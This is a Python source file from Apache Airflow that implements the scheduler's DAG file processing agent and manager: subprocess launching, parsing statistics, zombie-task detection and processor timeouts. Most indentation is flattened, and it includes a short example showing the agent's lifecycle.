# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Processes DAGs."""
import enum
import importlib
import inspect
import logging
import multiprocessing
import os
import signal
import sys
import time
from abc import ABCMeta, abstractmethod
from collections import defaultdict
from datetime import datetime, timedelta
from importlib import import_module
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import Any, Callable, Dict, List, NamedTuple, Optional, Tuple, Union, cast
from setproctitle import setproctitle # pylint: disable=no-name-in-module
from sqlalchemy import or_
from tabulate import tabulate
import airflow.models
from airflow.configuration import conf
from airflow.models import DagModel, errors
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import SimpleTaskInstance
from airflow.settings import STORE_DAG_CODE
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.callback_requests import CallbackRequest, SlaCallbackRequest, TaskCallbackRequest
from airflow.utils.file import list_py_file_paths
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.process_utils import kill_child_processes_by_pids, reap_process_group
from airflow.utils.session import provide_session
from airflow.utils.state import State
class AbstractDagFileProcessorProcess(metaclass=ABCMeta):
"""Processes a DAG file. See SchedulerJob.process_file() for more details."""
@abstractmethod
def start(self) -> None:
"""Launch the process to process the file"""
raise NotImplementedError()
@abstractmethod
def terminate(self, sigkill: bool = False):
"""Terminate (and then kill) the process launched to process the file"""
raise NotImplementedError()
@abstractmethod
def kill(self) -> None:
"""Kill the process launched to process the file, and ensure consistent state."""
raise NotImplementedError()
@property
@abstractmethod
def pid(self) -> int:
""":return: the PID of the process launched to process the given file"""
raise NotImplementedError()
@property
@abstractmethod
def exit_code(self) -> Optional[int]:
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
raise NotImplementedError()
@property
@abstractmethod
def done(self) -> bool:
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
raise NotImplementedError()
@property
@abstractmethod
def result(self) -> Optional[Tuple[int, int]]:
"""
        The number of DAGs found and the number of import errors
        :return: result of running SchedulerJob.process_file() if available. Otherwise, None
:rtype: Optional[Tuple[int, int]]
"""
raise NotImplementedError()
@property
@abstractmethod
def start_time(self) -> datetime:
"""
:return: When this started to process the file
:rtype: datetime
"""
raise NotImplementedError()
@property
@abstractmethod
def file_path(self) -> str:
"""
:return: the path to the file that this is processing
:rtype: unicode
"""
raise NotImplementedError()
@property
@abstractmethod
def waitable_handle(self):
"""A "waitable" handle that can be passed to ``multiprocessing.connection.wait()``"""
raise NotImplementedError()
class DagParsingStat(NamedTuple):
"""Information on processing progress"""
file_paths: List[str]
done: bool
all_files_processed: bool
class DagFileStat(NamedTuple):
"""Information about single processing of one file"""
num_dags: int
import_errors: int
last_finish_time: Optional[datetime]
last_duration: Optional[float]
run_count: int
class DagParsingSignal(enum.Enum):
"""All signals sent to parser."""
AGENT_RUN_ONCE = 'agent_run_once'
TERMINATE_MANAGER = 'terminate_manager'
END_MANAGER = 'end_manager'
class DagFileProcessorAgent(LoggingMixin, MultiprocessingStartMethodMixin):
"""
Agent for DAG file processing. It is responsible for all DAG parsing
related jobs in scheduler process. Mainly it can spin up DagFileProcessorManager
in a subprocess, collect DAG parsing results from it and communicate
signal/DAG parsing stat with it.
This class runs in the main `airflow scheduler` process.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: str
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_factory: function that creates processors for DAG
definition files. Arguments are (dag_definition_path, log_file_path)
:type processor_factory: ([str, List[CallbackRequest], Optional[List[str]], bool]) -> (
AbstractDagFileProcessorProcess
)
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param pickle_dags: whether to pickle DAGs.
    :type pickle_dags: bool
:param async_mode: Whether to start agent in async mode
:type async_mode: bool
"""
def __init__(
self,
dag_directory: str,
max_runs: int,
processor_factory: Callable[
[str, List[CallbackRequest], Optional[List[str]], bool], AbstractDagFileProcessorProcess
],
processor_timeout: timedelta,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool,
):
super().__init__()
self._file_path_queue: List[str] = []
self._dag_directory: str = dag_directory
self._max_runs = max_runs
self._processor_factory = processor_factory
self._processor_timeout = processor_timeout
self._dag_ids = dag_ids
self._pickle_dags = pickle_dags
self._async_mode = async_mode
# Map from file path to the processor
self._processors: Dict[str, AbstractDagFileProcessorProcess] = {}
# Pipe for communicating signals
self._process: Optional[multiprocessing.process.BaseProcess] = None
self._done: bool = False
# Initialized as true so we do not deactivate w/o any actual DAG parsing.
self._all_files_processed = True
self._parent_signal_conn: Optional[MultiprocessingConnection] = None
self._last_parsing_stat_received_at: float = time.monotonic()
def start(self) -> None:
"""Launch DagFileProcessorManager processor and start DAG parsing loop in manager."""
mp_start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(mp_start_method)
self._last_parsing_stat_received_at = time.monotonic()
self._parent_signal_conn, child_signal_conn = context.Pipe()
process = context.Process(
target=type(self)._run_processor_manager,
args=(
self._dag_directory,
self._max_runs,
# getattr prevents error while pickling an instance method.
getattr(self, "_processor_factory"),
self._processor_timeout,
child_signal_conn,
self._dag_ids,
self._pickle_dags,
self._async_mode,
),
)
self._process = process
process.start()
self.log.info("Launched DagFileProcessorManager with pid: %s", process.pid)
def run_single_parsing_loop(self) -> None:
"""
Should only be used when launched DAG file processor manager in sync mode.
Send agent heartbeat signal to the manager, requesting that it runs one
processing "loop".
Call wait_until_finished to ensure that any launched processors have
finished before continuing
"""
if not self._parent_signal_conn or not self._process:
raise ValueError("Process not started.")
if not self._process.is_alive():
return
try:
self._parent_signal_conn.send(DagParsingSignal.AGENT_RUN_ONCE)
except ConnectionError:
            # If this died because of an error, it will be noticed and restarted
            # when harvest_serialized_dags calls _heartbeat_manager.
pass
def send_callback_to_execute(self, request: CallbackRequest) -> None:
"""
Sends information about the callback to be executed by DagFileProcessor.
:param request: Callback request to be executed.
:type request: CallbackRequest
"""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
try:
self._parent_signal_conn.send(request)
except ConnectionError:
            # If this died because of an error, it will be noticed and restarted
            # when harvest_serialized_dags calls _heartbeat_manager.
pass
def send_sla_callback_request_to_execute(self, full_filepath: str, dag_id: str) -> None:
"""
Sends information about the SLA callback to be executed by DagFileProcessor.
:param full_filepath: DAG File path
:type full_filepath: str
:param dag_id: DAG ID
:type dag_id: str
"""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
try:
request = SlaCallbackRequest(full_filepath=full_filepath, dag_id=dag_id)
self._parent_signal_conn.send(request)
except ConnectionError:
            # If this died because of an error, it will be noticed and restarted
            # when harvest_serialized_dags calls _heartbeat_manager.
pass
def wait_until_finished(self) -> None:
"""Waits until DAG parsing is finished."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
while self._parent_signal_conn.poll(timeout=None):
try:
result = self._parent_signal_conn.recv()
except EOFError:
break
self._process_message(result)
if isinstance(result, DagParsingStat):
# In sync mode we don't send this message from the Manager
# until all the running processors have finished
self._sync_metadata(result)
return
@staticmethod
def _run_processor_manager(
dag_directory: str,
max_runs: int,
processor_factory: Callable[[str, List[CallbackRequest]], AbstractDagFileProcessorProcess],
processor_timeout: timedelta,
signal_conn: MultiprocessingConnection,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool,
) -> None:
# Make this process start as a new process group - that makes it easy
# to kill all sub-process of this at the OS-level, rather than having
# to iterate the child processes
os.setpgid(0, 0)
setproctitle("airflow scheduler -- DagFileProcessorManager")
# Reload configurations and settings to avoid collision with parent process.
# Because this process may need custom configurations that cannot be shared,
# e.g. RotatingFileHandler. And it can cause connection corruption if we
# do not recreate the SQLA connection pool.
os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER'] = 'True'
os.environ['AIRFLOW__LOGGING__COLORED_CONSOLE_LOG'] = 'False'
# Replicating the behavior of how logging module was loaded
# in logging_config.py
importlib.reload(import_module(airflow.settings.LOGGING_CLASS_PATH.rsplit('.', 1)[0])) # type: ignore
importlib.reload(airflow.settings)
airflow.settings.initialize()
del os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER']
processor_manager = DagFileProcessorManager(
dag_directory,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
dag_ids,
pickle_dags,
async_mode,
)
processor_manager.start()
def heartbeat(self) -> None:
"""Check if the DagFileProcessorManager process is alive, and process any pending messages"""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
# Receive any pending messages before checking if the process has exited.
while self._parent_signal_conn.poll(timeout=0.01):
try:
result = self._parent_signal_conn.recv()
except (EOFError, ConnectionError):
break
self._process_message(result)
# If it died unexpectedly restart the manager process
self._heartbeat_manager()
def _process_message(self, message):
self.log.debug("Received message of type %s", type(message).__name__)
if isinstance(message, DagParsingStat):
self._sync_metadata(message)
else:
raise RuntimeError(f"Unexpected message received of type {type(message).__name__}")
def _heartbeat_manager(self):
"""Heartbeat DAG file processor and restart it if we are not done."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
if self._process and not self._process.is_alive():
self._process.join(timeout=0)
if not self.done:
self.log.warning(
"DagFileProcessorManager (PID=%d) exited with exit code %d - re-launching",
self._process.pid,
self._process.exitcode,
)
self.start()
if self.done:
return
parsing_stat_age = time.monotonic() - self._last_parsing_stat_received_at
if parsing_stat_age > self._processor_timeout.total_seconds():
Stats.incr('dag_processing.manager_stalls')
self.log.error(
"DagFileProcessorManager (PID=%d) last sent a heartbeat %.2f seconds ago! Restarting it",
self._process.pid,
parsing_stat_age,
)
reap_process_group(self._process.pid, logger=self.log)
self.start()
def _sync_metadata(self, stat):
"""Sync metadata from stat queue and only keep the latest stat."""
self._done = stat.done
self._all_files_processed = stat.all_files_processed
self._last_parsing_stat_received_at = time.monotonic()
@property
def done(self) -> bool:
"""Has DagFileProcessorManager ended?"""
return self._done
@property
def all_files_processed(self):
"""Have all files been processed at least once?"""
return self._all_files_processed
def terminate(self):
"""
Send termination signal to DAG parsing processor manager
and expect it to terminate all DAG file processors.
"""
if self._process and self._process.is_alive():
self.log.info("Sending termination message to manager.")
try:
self._parent_signal_conn.send(DagParsingSignal.TERMINATE_MANAGER)
except ConnectionError:
pass
def end(self):
"""
Terminate (and then kill) the manager process launched.
:return:
"""
if not self._process:
self.log.warning('Ending without manager process.')
return
# Give the Manager some time to cleanly shut down, but not too long, as
# it's better to finish sooner than wait for (non-critical) work to
# finish
self._process.join(timeout=1.0)
reap_process_group(self._process.pid, logger=self.log)
self._parent_signal_conn.close()
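# Hedged sketch (not part of Airflow): the typical lifecycle of the agent defined
# above, as the scheduler drives it. ``make_processor`` is a hypothetical factory
# matching the documented processor_factory signature.
def _example_agent_lifecycle(make_processor, dag_folder="/opt/airflow/dags"):
    agent = DagFileProcessorAgent(
        dag_directory=dag_folder,
        max_runs=1,
        processor_factory=make_processor,
        processor_timeout=timedelta(minutes=5),
        dag_ids=None,
        pickle_dags=False,
        async_mode=True,
    )
    agent.start()  # spawns the DagFileProcessorManager subprocess
    while not agent.done:
        agent.heartbeat()  # drain parsing stats and restart the manager if it died
        time.sleep(1)
    agent.terminate()
    agent.end()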
class DagFileProcessorManager(LoggingMixin): # pylint: disable=too-many-instance-attributes
"""
Given a list of DAG definition files, this kicks off several processors
    in parallel to process them and put the results in a multiprocessing.Queue
for DagFileProcessorAgent to harvest. The parallelism is limited and as the
processors finish, more are launched. The files are processed over and
over again, but no more often than the specified interval.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: unicode
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_factory: function that creates processors for DAG
definition files. Arguments are (dag_definition_path)
:type processor_factory: (unicode, unicode, list) -> (AbstractDagFileProcessorProcess)
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param signal_conn: connection to communicate signal with processor agent.
:type signal_conn: MultiprocessingConnection
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param pickle_dags: whether to pickle DAGs.
:type pickle_dags: bool
:param async_mode: whether to start the manager in async mode
:type async_mode: bool
"""
def __init__(
self,
dag_directory: str,
max_runs: int,
processor_factory: Callable[[str, List[CallbackRequest]], AbstractDagFileProcessorProcess],
processor_timeout: timedelta,
signal_conn: MultiprocessingConnection,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool = True,
):
super().__init__()
self._file_paths: List[str] = []
self._file_path_queue: List[str] = []
self._dag_directory = dag_directory
self._max_runs = max_runs
self._processor_factory = processor_factory
self._signal_conn = signal_conn
self._pickle_dags = pickle_dags
self._dag_ids = dag_ids
self._async_mode = async_mode
self._parsing_start_time: Optional[int] = None
self._parallelism = conf.getint('scheduler', 'parsing_processes')
if 'sqlite' in conf.get('core', 'sql_alchemy_conn') and self._parallelism > 1:
self.log.warning(
"Because we cannot use more than 1 thread (parsing_processes = "
"%d ) when using sqlite. So we set parallelism to 1.",
self._parallelism,
)
self._parallelism = 1
# Parse and schedule each file no faster than this interval.
self._file_process_interval = conf.getint('scheduler', 'min_file_process_interval')
# How often to print out DAG file processing stats to the log. Default to
# 30 seconds.
self.print_stats_interval = conf.getint('scheduler', 'print_stats_interval')
        # How many seconds do we wait for tasks to heartbeat before marking them as zombies.
self._zombie_threshold_secs = conf.getint('scheduler', 'scheduler_zombie_task_threshold')
# Should store dag file source in a database?
self.store_dag_code = STORE_DAG_CODE
# Map from file path to the processor
self._processors: Dict[str, AbstractDagFileProcessorProcess] = {}
self._num_run = 0
# Map from file path to stats about the file
self._file_stats: Dict[str, DagFileStat] = {}
self._last_zombie_query_time = None
# Last time that the DAG dir was traversed to look for files
self.last_dag_dir_refresh_time = timezone.make_aware(datetime.fromtimestamp(0))
# Last time stats were printed
self.last_stat_print_time = 0
# TODO: Remove magic number
self._zombie_query_interval = 10
# How long to wait before timing out a process to parse a DAG file
self._processor_timeout = processor_timeout
# How often to scan the DAGs directory for new files. Default to 5 minutes.
self.dag_dir_list_interval = conf.getint('scheduler', 'dag_dir_list_interval')
# Mapping file name and callbacks requests
self._callback_to_execute: Dict[str, List[CallbackRequest]] = defaultdict(list)
self._log = logging.getLogger('airflow.processor_manager')
self.waitables: Dict[Any, Union[MultiprocessingConnection, AbstractDagFileProcessorProcess]] = {
self._signal_conn: self._signal_conn,
}
def register_exit_signals(self):
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
# So that we ignore the debug dump signal, making it easier to send
signal.signal(signal.SIGUSR2, signal.SIG_IGN)
def _exit_gracefully(self, signum, frame): # pylint: disable=unused-argument
"""Helper method to clean up DAG file processors to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
self.log.debug("Current Stacktrace is: %s", '\n'.join(map(str, inspect.stack())))
self.terminate()
self.end()
self.log.debug("Finished terminating DAG processors.")
sys.exit(os.EX_OK)
def start(self):
"""
Use multiple processes to parse and generate tasks for the
DAGs in parallel. By processing them in separate processes,
we can get parallelism and isolation from potentially harmful
user code.
"""
self.register_exit_signals()
# Start a new process group
os.setpgid(0, 0)
self.log.info("Processing files using up to %s processes at a time ", self._parallelism)
self.log.info("Process each file at most once every %s seconds", self._file_process_interval)
self.log.info(
"Checking for new files in %s every %s seconds", self._dag_directory, self.dag_dir_list_interval
)
return self._run_parsing_loop()
def _run_parsing_loop(self):
# In sync mode we want timeout=None -- wait forever until a message is received
if self._async_mode:
poll_time = 0.0
else:
poll_time = None
self._refresh_dag_dir()
self.prepare_file_path_queue()
if self._async_mode:
# If we're in async mode, we can start up straight away. If we're
# in sync mode we need to be told to start a "loop"
self.start_new_processes()
while True:
loop_start_time = time.monotonic()
# pylint: disable=no-else-break
ready = multiprocessing.connection.wait(self.waitables.keys(), timeout=poll_time)
if self._signal_conn in ready:
agent_signal = self._signal_conn.recv()
self.log.debug("Received %s signal from DagFileProcessorAgent", agent_signal)
if agent_signal == DagParsingSignal.TERMINATE_MANAGER:
self.terminate()
break
elif agent_signal == DagParsingSignal.END_MANAGER:
self.end()
sys.exit(os.EX_OK)
elif agent_signal == DagParsingSignal.AGENT_RUN_ONCE:
# continue the loop to parse dags
pass
elif isinstance(agent_signal, CallbackRequest):
self._add_callback_to_queue(agent_signal)
else:
raise ValueError(f"Invalid message {type(agent_signal)}")
if not ready and not self._async_mode:
# In "sync" mode we don't want to parse the DAGs until we
# are told to (as that would open another connection to the
# SQLite DB which isn't a good practice
# This shouldn't happen, as in sync mode poll should block for
# ever. Lets be defensive about that.
self.log.warning(
"wait() unexpectedly returned nothing ready after infinite timeout (%r)!", poll_time
)
continue
for sentinel in ready:
if sentinel is self._signal_conn:
continue
processor = self.waitables.get(sentinel)
if not processor:
continue
self._collect_results_from_processor(processor)
self.waitables.pop(sentinel)
self._processors.pop(processor.file_path)
self._refresh_dag_dir()
self._find_zombies() # pylint: disable=no-value-for-parameter
self._kill_timed_out_processors()
# Generate more file paths to process if we processed all the files
# already.
if not self._file_path_queue:
self.emit_metrics()
self.prepare_file_path_queue()
self.start_new_processes()
# Update number of loop iteration.
self._num_run += 1
if not self._async_mode:
self.log.debug("Waiting for processors to finish since we're using sqlite")
# Wait until the running DAG processors are finished before
# sending a DagParsingStat message back. This means the Agent
# can tell we've got to the end of this iteration when it sees
# this type of message
self.wait_until_finished()
# Collect anything else that has finished, but don't kick off any more processors
self.collect_results()
self._print_stat()
all_files_processed = all(self.get_last_finish_time(x) is not None for x in self.file_paths)
max_runs_reached = self.max_runs_reached()
dag_parsing_stat = DagParsingStat(
self._file_paths,
max_runs_reached,
all_files_processed,
)
self._signal_conn.send(dag_parsing_stat)
if max_runs_reached:
self.log.info(
"Exiting dag parsing loop as all files have been processed %s times", self._max_runs
)
break
if self._async_mode:
loop_duration = time.monotonic() - loop_start_time
if loop_duration < 1:
poll_time = 1 - loop_duration
else:
poll_time = 0.0
def _add_callback_to_queue(self, request: CallbackRequest):
self._callback_to_execute[request.full_filepath].append(request)
        # Callbacks have a higher priority than DAG Run scheduling
if request.full_filepath in self._file_path_queue:
self._file_path_queue.remove(request.full_filepath)
self._file_path_queue.insert(0, request.full_filepath)
def _refresh_dag_dir(self):
"""Refresh file paths from dag dir if we haven't done it for too long."""
now = timezone.utcnow()
elapsed_time_since_refresh = (now - self.last_dag_dir_refresh_time).total_seconds()
if elapsed_time_since_refresh > self.dag_dir_list_interval:
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self._dag_directory)
self._file_paths = list_py_file_paths(self._dag_directory)
self.last_dag_dir_refresh_time = now
self.log.info("There are %s files in %s", len(self._file_paths), self._dag_directory)
self.set_file_paths(self._file_paths)
try:
self.log.debug("Removing old import errors")
self.clear_nonexistent_import_errors() # pylint: disable=no-value-for-parameter
except Exception: # noqa pylint: disable=broad-except
self.log.exception("Error removing old import errors")
SerializedDagModel.remove_deleted_dags(self._file_paths)
DagModel.deactivate_deleted_dags(self._file_paths)
if self.store_dag_code:
from airflow.models.dagcode import DagCode
DagCode.remove_deleted_code(self._file_paths)
def _print_stat(self):
"""Occasionally print out stats about how fast the files are getting processed"""
if 0 < self.print_stats_interval < time.monotonic() - self.last_stat_print_time:
if self._file_paths:
self._log_file_processing_stats(self._file_paths)
self.last_stat_print_time = time.monotonic()
@provide_session
def clear_nonexistent_import_errors(self, session):
"""
Clears import errors for files that no longer exist.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
"""
query = session.query(errors.ImportError)
if self._file_paths:
query = query.filter(~errors.ImportError.filename.in_(self._file_paths))
query.delete(synchronize_session='fetch')
session.commit()
def _log_file_processing_stats(self, known_file_paths):
"""
Print out stats about how files are getting processed.
:param known_file_paths: a list of file paths that may contain Airflow
DAG definitions
:type known_file_paths: list[unicode]
:return: None
"""
# File Path: Path to the file containing the DAG definition
# PID: PID associated with the process that's processing the file. May
# be empty.
# Runtime: If the process is currently running, how long it's been
# running for in seconds.
# Last Runtime: If the process ran before, how long did it take to
# finish in seconds
# Last Run: When the file finished processing in the previous run.
headers = ["File Path", "PID", "Runtime", "# DAGs", "# Errors", "Last Runtime", "Last Run"]
rows = []
now = timezone.utcnow()
for file_path in known_file_paths:
last_runtime = self.get_last_runtime(file_path)
num_dags = self.get_last_dag_count(file_path)
num_errors = self.get_last_error_count(file_path)
file_name = os.path.basename(file_path)
file_name = os.path.splitext(file_name)[0].replace(os.sep, '.')
processor_pid = self.get_pid(file_path)
processor_start_time = self.get_start_time(file_path)
runtime = (now - processor_start_time) if processor_start_time else None
last_run = self.get_last_finish_time(file_path)
if last_run:
seconds_ago = (now - last_run).total_seconds()
Stats.gauge(f'dag_processing.last_run.seconds_ago.{file_name}', seconds_ago)
if runtime:
Stats.timing(f'dag_processing.last_duration.{file_name}', runtime)
rows.append((file_path, processor_pid, runtime, num_dags, num_errors, last_runtime, last_run))
        # Sort by longest last runtime. (Can't sort None values in python3)
        rows = sorted(rows, key=lambda x: x[5] or 0.0)
formatted_rows = []
for file_path, pid, runtime, num_dags, num_errors, last_runtime, last_run in rows:
formatted_rows.append(
(
file_path,
pid,
f"{runtime.total_seconds():.2f}s" if runtime else None,
num_dags,
num_errors,
f"{last_runtime:.2f}s" if last_runtime else None,
last_run.strftime("%Y-%m-%dT%H:%M:%S") if last_run else None,
)
)
log_str = (
"\n"
+ "=" * 80
+ "\n"
+ "DAG File Processing Stats\n\n"
+ tabulate(formatted_rows, headers=headers)
+ "\n"
+ "=" * 80
)
self.log.info(log_str)
def get_pid(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the PID of the process processing the given file or None if
the specified file is not being processed
:rtype: int
"""
if file_path in self._processors:
return self._processors[file_path].pid
return None
def get_all_pids(self):
"""
:return: a list of the PIDs for the processors that are running
:rtype: List[int]
"""
return [x.pid for x in self._processors.values()]
def get_last_runtime(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the runtime (in seconds) of the process of the last run, or
None if the file was never processed.
:rtype: float
"""
stat = self._file_stats.get(file_path)
return stat.last_duration if stat else None
def get_last_dag_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the number of dags loaded from that file, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.num_dags if stat else None
def get_last_error_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the number of import errors from processing, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.import_errors if stat else None
def get_last_finish_time(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the finish time of the process of the last run, or None if the
file was never processed.
:rtype: datetime
"""
stat = self._file_stats.get(file_path)
return stat.last_finish_time if stat else None
def get_start_time(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the start time of the process that's processing the
specified file or None if the file is not currently being processed
:rtype: datetime
"""
if file_path in self._processors:
return self._processors[file_path].start_time
return None
def get_run_count(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the number of times the given file has been parsed
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.run_count if stat else 0
def set_file_paths(self, new_file_paths):
"""
Update this with a new set of paths to DAG definition files.
:param new_file_paths: list of paths to DAG definition files
:type new_file_paths: list[unicode]
:return: None
"""
self._file_paths = new_file_paths
self._file_path_queue = [x for x in self._file_path_queue if x in new_file_paths]
# Stop processors that are working on deleted files
filtered_processors = {}
for file_path, processor in self._processors.items():
if file_path in new_file_paths:
filtered_processors[file_path] = processor
else:
self.log.warning("Stopping processor for %s", file_path)
Stats.decr('dag_processing.processes')
processor.terminate()
self._file_stats.pop(file_path)
self._processors = filtered_processors
def wait_until_finished(self):
"""Sleeps until all the processors are done."""
for processor in self._processors.values():
while not processor.done:
time.sleep(0.1)
def _collect_results_from_processor(self, processor) -> None:
self.log.debug("Processor for %s finished", processor.file_path)
Stats.decr('dag_processing.processes')
last_finish_time = timezone.utcnow()
if processor.result is not None:
num_dags, count_import_errors = processor.result
else:
self.log.error(
"Processor for %s exited with return code %s.", processor.file_path, processor.exit_code
)
count_import_errors = -1
num_dags = 0
stat = DagFileStat(
num_dags=num_dags,
import_errors=count_import_errors,
last_finish_time=last_finish_time,
last_duration=(last_finish_time - processor.start_time).total_seconds(),
run_count=self.get_run_count(processor.file_path) + 1,
)
self._file_stats[processor.file_path] = stat
def collect_results(self) -> None:
"""Collect the result from any finished DAG processors"""
ready = multiprocessing.connection.wait(self.waitables.keys() - [self._signal_conn], timeout=0)
for sentinel in ready:
if sentinel is self._signal_conn:
continue
processor = cast(AbstractDagFileProcessorProcess, self.waitables[sentinel])
self.waitables.pop(processor.waitable_handle)
self._processors.pop(processor.file_path)
self._collect_results_from_processor(processor)
self.log.debug("%s/%s DAG parsing processes running", len(self._processors), self._parallelism)
self.log.debug("%s file paths queued for processing", len(self._file_path_queue))
def start_new_processes(self):
"""Start more processors if we have enough slots and files to process"""
while self._parallelism - len(self._processors) > 0 and self._file_path_queue:
file_path = self._file_path_queue.pop(0)
callback_to_execute_for_file = self._callback_to_execute[file_path]
processor = self._processor_factory(
file_path, callback_to_execute_for_file, self._dag_ids, self._pickle_dags
)
del self._callback_to_execute[file_path]
Stats.incr('dag_processing.processes')
processor.start()
self.log.debug("Started a process (PID: %s) to generate tasks for %s", processor.pid, file_path)
self._processors[file_path] = processor
self.waitables[processor.waitable_handle] = processor
def prepare_file_path_queue(self):
"""Generate more file paths to process. Result are saved in _file_path_queue."""
self._parsing_start_time = time.perf_counter()
# If the file path is already being processed, or if a file was
# processed recently, wait until the next batch
file_paths_in_progress = self._processors.keys()
now = timezone.utcnow()
file_paths_recently_processed = []
for file_path in self._file_paths:
last_finish_time = self.get_last_finish_time(file_path)
if (
last_finish_time is not None
and (now - last_finish_time).total_seconds() < self._file_process_interval
):
file_paths_recently_processed.append(file_path)
files_paths_at_run_limit = [
file_path for file_path, stat in self._file_stats.items() if stat.run_count == self._max_runs
]
files_paths_to_queue = list(
set(self._file_paths)
- set(file_paths_in_progress)
- set(file_paths_recently_processed)
- set(files_paths_at_run_limit)
)
for file_path, processor in self._processors.items():
self.log.debug(
"File path %s is still being processed (started: %s)",
processor.file_path,
processor.start_time.isoformat(),
)
self.log.debug("Queuing the following files for processing:\n\t%s", "\n\t".join(files_paths_to_queue))
for file_path in files_paths_to_queue:
if file_path not in self._file_stats:
self._file_stats[file_path] = DagFileStat(
num_dags=0, import_errors=0, last_finish_time=None, last_duration=None, run_count=0
)
self._file_path_queue.extend(files_paths_to_queue)
@provide_session
def _find_zombies(self, session):
"""
        Find zombie task instances, which are tasks that haven't heartbeated
        for too long, and update the current zombie list.
"""
now = timezone.utcnow()
if (
not self._last_zombie_query_time
or (now - self._last_zombie_query_time).total_seconds() > self._zombie_query_interval
):
# to avoid circular imports
from airflow.jobs.local_task_job import LocalTaskJob as LJ
self.log.info("Finding 'running' jobs without a recent heartbeat")
TI = airflow.models.TaskInstance
DM = airflow.models.DagModel
limit_dttm = timezone.utcnow() - timedelta(seconds=self._zombie_threshold_secs)
self.log.info("Failing jobs without heartbeat after %s", limit_dttm)
zombies = (
session.query(TI, DM.fileloc)
.join(LJ, TI.job_id == LJ.id)
.join(DM, TI.dag_id == DM.dag_id)
.filter(TI.state == State.RUNNING)
.filter(
or_(
LJ.state != State.RUNNING,
LJ.latest_heartbeat < limit_dttm,
)
)
.all()
)
self._last_zombie_query_time = timezone.utcnow()
for ti, file_loc in zombies:
request = TaskCallbackRequest(
full_filepath=file_loc,
simple_task_instance=SimpleTaskInstance(ti),
msg="Detected as zombie",
)
self.log.info("Detected zombie job: %s", request)
self._add_callback_to_queue(request)
Stats.incr('zombies_killed')
def _kill_timed_out_processors(self):
"""Kill any file processors that timeout to defend against process hangs."""
now = timezone.utcnow()
for file_path, processor in self._processors.items():
duration = now - processor.start_time
if duration > self._processor_timeout:
self.log.error(
"Processor for %s with PID %s started at %s has timed out, killing it.",
file_path,
processor.pid,
processor.start_time.isoformat(),
)
Stats.decr('dag_processing.processes')
Stats.incr('dag_processing.processor_timeouts')
# TODO: Remove after Airflow 2.0
Stats.incr('dag_file_processor_timeouts')
processor.kill()
def max_runs_reached(self):
""":return: whether all file paths have been processed max_runs times"""
if self._max_runs == -1: # Unlimited runs.
return False
for stat in self._file_stats.values():
if stat.run_count < self._max_runs:
return False
if self._num_run < self._max_runs:
return False
return True
def terminate(self):
"""
Stops all running processors
:return: None
"""
for processor in self._processors.values():
Stats.decr('dag_processing.processes')
processor.terminate()
def end(self):
"""
Kill all child processes on exit since we don't want to leave
them as orphaned.
"""
pids_to_kill = self.get_all_pids()
if pids_to_kill:
kill_child_processes_by_pids(pids_to_kill)
def emit_metrics(self):
"""
Emit metrics about dag parsing summary
This is called once every time around the parsing "loop" - i.e. after
all files have been parsed.
"""
parse_time = time.perf_counter() - self._parsing_start_time
Stats.gauge('dag_processing.total_parse_time', parse_time)
Stats.gauge('dagbag_size', sum(stat.num_dags for stat in self._file_stats.values()))
Stats.gauge(
'dag_processing.import_errors', sum(stat.import_errors for stat in self._file_stats.values())
)
